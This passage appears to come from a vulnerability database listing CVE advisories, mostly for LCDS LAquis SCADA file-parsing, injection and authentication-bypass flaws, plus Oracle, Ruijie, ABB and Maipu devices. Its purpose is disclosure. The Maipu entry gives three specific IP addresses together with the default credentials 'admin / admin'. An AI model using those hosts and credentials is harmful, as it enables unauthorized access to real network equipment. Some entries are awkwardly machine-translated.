An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0639 | CVE-2018-19000 | LCDS LAquis SCADA Authentication Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows an authentication bypass, which may allow an attacker access to sensitive data. LCDS Laquis SCADA Contains an authentication vulnerability.Information may be obtained. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of URIs by the product's web server. A crafted URI can cause the web service to bypass authentication that should be required for the web page. An attacker can leverage this vulnerability to access system information. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0645 | CVE-2018-19029 | LCDS Laquis SCADA In NULL Pointer dereference vulnerability |
CVSS V2: 8.3 CVSS V3: 7.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows an attacker using a specially crafted project file to supply a pointer for a controlled memory address, which may allow remote code execution, data exfiltration, or cause a system crash. LCDS Laquis SCADA Is NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. A security vulnerability exists in the LCDS LAquis SCADA version 4.1.0.3870. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201901-0234 | CVE-2019-2399 | Oracle Communications Applications of Oracle Communications Diameter Signaling Router In Security Vulnerabilities |
CVSS V2: 6.4 CVSS V3: 6.5 Severity: MEDIUM |
Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) component of Oracle Communications Applications (subcomponent: Security). The supported version that is affected is prior to 8.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Communications Diameter Signaling Router (DSR). CVSS 3.0 Base Score 6.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L).
The vulnerability can be exploited over the 'HTTP' protocol. The 'Security' component is affected. Attackers can use this vulnerability to read data without authorization, causing denial of service and affecting data confidentiality and availability
| VAR-201901-1700 | No CVE | Maple Switch Has Weak Password Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Maipu switches generally have weak passwords. After entering, they can perform arbitrary operations by low-privileged users.
This is based on http basic authentication
http://111.50.98.155:80
http://111.50.98.151:80
http://111.50.98.154:80
admin / admin
| VAR-201901-1696 | No CVE | Ruijie RG-AC128 has remote command execution vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Ruijie RG-AC128 is a new generation of wireless controller for high-speed wireless network launched by Ruijie Networks.
Ruijie RG-AC128 has a remote command execution vulnerability. An attacker could use this vulnerability to execute a command.
| VAR-201901-1515 | CVE-2018-20720 | ABB Relion 630 Vulnerability related to input validation on devices |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
ABB Relion 630 devices 1.1 before 1.1.0.C0, 1.2 before 1.2.0.B3, and 1.3 before 1.3.0.A6 allow remote attackers to cause a denial of service (reboot) via a reboot command in an SPA message. ABB Relion 630 The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. ABB Relion 630 is a relay device used for substation automation protection and control from ABB in Switzerland.
ABB Relion 630 has security vulnerabilities in version 1.1 before 1.1.0.C0, version 1.2 before 1.2.0.B3, and version 1.3 before 1.3.0.A6. ABB Relion 630 is prone to a denial-of-service vulnerability.
Successful exploits of this issue may allow an attacker to crash the affected device, denying service to legitimate users.
The following versions of ABB Relion 630 series are vulnerable:
ABB Relion 630 series prior to 1.1.0.C0
ABB Relion 630 series prior to 1.2.0.B3
ABB Relion 630 series prior to 1.3.0.A6
| VAR-201903-1176 | CVE-2018-18994 | LCDS Laquis SCADA Vulnerable to out-of-bounds reading |
CVSS V2: 7.8 CVSS V3: 7.1 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows an out of bounds read when opening a specially crafted project file, which may cause a system crash or allow data exfiltration. LCDS Laquis SCADA Contains an out-of-bounds vulnerability.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0640 | CVE-2018-19002 | LCDS LAquis SCADA Code injection vulnerability |
CVSS V2: 8.3 CVSS V3: 7.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows improper control of generation of code when opening a specially crafted project file, which may allow remote code execution, data exfiltration, or cause a system crash. LCDS Laquis SCADA Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a controlled call to VirtualProtect. An attacker can leverage this vulnerability to execute code in the context of the aq process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0648 | CVE-2018-18990 | LCDS LAquis SCADA Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows a user-supplied path in file operations prior to proper validation. An attacker can leverage this vulnerability to disclose sensitive information under the context of the web server process. LCDS Laquis SCADA Contains a path traversal vulnerability.Information may be obtained. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of requested URLs. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. The vulnerability stems from the fact that the program failed to validate correctly before using the user-submitted path. information. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0646 | CVE-2018-18986 | LCDS Laquis SCADA Vulnerable to out-of-bounds reading |
CVSS V2: 8.3 CVSS V3: 7.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows the opening of a specially crafted report format file that may cause an out of bounds read, which may cause a system crash, allow data exfiltration, or remote code execution. LCDS Laquis SCADA Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of LGX files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0649 | CVE-2018-18992 | LCDS LAquis SCADA Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: 8.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows taking in user input without proper sanitation, which may allow an attacker to execute remote code on the server. LCDS Laquis SCADA Contains an injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to relatorioindividual.lhtml. When parsing the TAG Element, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the aq process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. A security vulnerability exists in the LCDS LAquis SCADA version 4.1.0.3870, which was caused by a user receiving a user input without properly filtering it. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0641 | CVE-2018-19004 | LAquis SCADA LQS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability |
CVSS V2: 4.3 CVSS V3: 3.3 Severity: LOW |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows out of bounds read when opening a specially crafted project file, which may allow data exfiltration. LCDS Laquis SCADA Contains an out-of-bounds vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected